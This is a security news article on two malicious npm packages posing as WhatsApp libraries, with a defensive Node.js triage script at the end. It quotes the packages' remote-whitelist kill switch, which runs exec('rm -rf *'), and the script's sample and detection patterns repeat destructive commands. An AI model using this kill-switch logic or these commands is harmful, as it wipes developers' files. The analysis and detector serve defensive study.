WhatsApp Developers Under Attack From Weaponized npm Packages with Remote Kill Switch

Two malicious npm packages target WhatsApp developers with a remotely controlled kill switch that, once triggered, recursively deletes the contents of the directory the developer's project runs in.

The packages, identified as naya-flore and nvlore-hsc, masquerade as legitimate WhatsApp socket libraries while carrying a destructive branch that runs a single shell command, rm -rf *, against the working directory.

Published by npm user nayflore using the email address [email protected], these weaponized packages have accumulated over 1,110 downloads within a month, demonstrating their effectiveness in infiltrating developer workflows.


The malicious libraries prey on the growing WhatsApp Business API ecosystem, which now serves over 200 million businesses globally and in which developers routinely install third-party packages for chatbot development, customer service automation, and messaging integrations.

Socket.dev researchers found the attack logic embedded in what otherwise looks like standard WhatsApp integration code.

The malicious code sits inside the packages' requestPairingCode function, which mirrors a legitimate API that developers would naturally call while setting up WhatsApp bot authentication.

Remote Kill Switch Architecture

The kill switch is hidden inside the packages' phone number verification step.

When requestPairingCode runs, the code fetches a remote list of whitelisted phone numbers from a GitHub repository; the URL is stored as a Base64 string rather than in the clear:

const sesiPath = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2E";
// Decodes to: https://raw.githubusercontent.com/navaLinh/database/main/seska.json
// Note: the literal as printed here is cut short; it decodes only as far as ".../main/seska",
// the ".json" suffix in the full URL is not part of the string shown.

The decision logic inside requestPairingCode is deceptively simple. After fetching the remote whitelist, the code checks whether the developer's phone number appears in it.


Whitelisted phone number list showing Indonesian mobile numbers that bypass the kill switch (Source – Socket.dev)

If the number is found, the package continues normal operation. For any unlisted phone number, the code sets a trigger variable to "0000" and executes the destructive payload:

if (getsNumberCode === "0000") {
    exec('rm -rf *')  // Destroy system: recursively deletes everything under the process's working directory
}

Because the whitelist is consulted before the payload fires, the operators can spare systems belonging to the listed numbers (presumably their own or their associates') while any other developer who pairs a phone number triggers the wipe.

Because the list lives in a GitHub repository rather than in the package itself, the operators can change who is spared and who is wiped at any time without publishing a new version, so reviewing the published tarball alone does not reveal the current targeting. This is the part practitioners should note: a package whose behaviour depends on remotely fetched data cannot be fully assessed by static review of what npm delivers.
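As an added example, not code from the Socket.dev report or from the packages themselves, the following Node.js script shows how to triage an installed dependency for the two indicators described above: string literals that Base64-decode to a URL (a remote configuration fetch hidden from grep), and child_process calls whose command string is destructive. The source it scans is constructed here to mirror the shape of the malicious requestPairingCode, using a hypothetical repository URL; nothing in the scanned text is executed.

```javascript
"use strict";

// Double- or single-quoted literals made only of base64 characters, 24+ long.
// Short literals are skipped to keep the noise down during triage.
const B64_LITERAL = /["']([A-Za-z0-9+/]{24,}={0,2})["']/g;

// child_process-style calls whose command literal contains a destructive pattern.
// Deliberately simple: this is a triage heuristic, not a JavaScript parser.
const DESTRUCTIVE_EXEC =
  /\b(exec|execSync|spawn|spawnSync)\s*\(\s*["'`]([^"'`]*?(rm\s+-rf|del\s+\/[sq]|format\s+[a-z]:)[^"'`]*)["'`]/gi;

// Decode a base64 literal; Node tolerates missing padding. Anything that does
// not decode to printable ASCII is treated as "not a hidden string" (null).
function decodeBase64(literal) {
  const text = Buffer.from(literal, "base64").toString("utf8");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Every base64 literal in the source that decodes to an http(s) URL, with a
// flag for hosts commonly used as free remote-configuration stores.
function findHiddenUrls(source) {
  const hits = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const decoded = decodeBase64(m[1]);
    if (decoded && /^https?:\/\//i.test(decoded)) {
      hits.push({
        literal: m[1],
        url: decoded,
        remoteConfig: /raw\.githubusercontent\.com|gist\.github|pastebin/i.test(decoded),
      });
    }
  }
  return hits;
}

// Every exec/spawn call whose command literal matches a destructive pattern.
function findDestructiveExec(source) {
  const hits = [];
  for (const m of source.matchAll(DESTRUCTIVE_EXEC)) {
    hits.push({ call: m[1], command: m[2] });
  }
  return hits;
}

// Combine both indicators: a remotely fetched list plus a destructive command
// in the same file is the kill-switch shape described in the report.
function triage(source) {
  const urls = findHiddenUrls(source);
  const execs = findDestructiveExec(source);
  const killSwitchShape = urls.some((u) => u.remoteConfig) && execs.length > 0;
  return { urls, execs, killSwitchShape };
}

// Constructed sample (hypothetical URL, not the attackers' repository) that
// reproduces the shape of the malicious function. It is scanned as text only.
const SAMPLE_URL = "https://raw.githubusercontent.com/example-org/database/main/list.json";
const SAMPLE_SOURCE = `
const sesiPath = "${Buffer.from(SAMPLE_URL).toString("base64")}";
async function requestPairingCode(phoneNumber) {
  const list = await (await fetch(Buffer.from(sesiPath, "base64").toString())).json();
  const getsNumberCode = list.includes(phoneNumber) ? "ok" : "0000";
  if (getsNumberCode === "0000") {
    exec('rm -rf *');
  }
}
`;

console.log(JSON.stringify(triage(SAMPLE_SOURCE), null, 2));
```

To use it against a real dependency, read each .js file under node_modules/<package>/ and pass its contents to triage(); a result with killSwitchShape set to true is worth a manual look before the package ever runs. The heuristic will miss strings assembled at runtime or commands built from fragments, so treat a clean result as "nothing obvious", not as a verdict.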
